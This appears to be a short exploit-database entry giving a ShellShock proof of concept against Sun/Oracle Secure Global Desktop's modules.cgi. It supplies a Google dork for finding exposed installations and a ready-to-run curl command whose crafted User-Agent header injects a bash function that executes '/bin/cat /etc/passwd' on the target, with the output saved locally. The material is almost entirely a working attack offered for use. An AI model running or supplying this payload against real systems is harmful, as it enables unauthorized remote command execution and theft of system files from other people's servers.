# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop # Google Dork: intitle:Install the Sun Secure Global Desktop Native Client # Date: 6/4/2016 # Exploit Author: lastc0de@outlook.com # Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/ # Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html # Version: 4.61.915 # Tested on: Linux VULNERABLE FILE http://target.com//tarantella/cgi-bin/modules.cgi POC : localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt localhost@~#cat xixixi.txt which will print out the content of /etc/passwd file.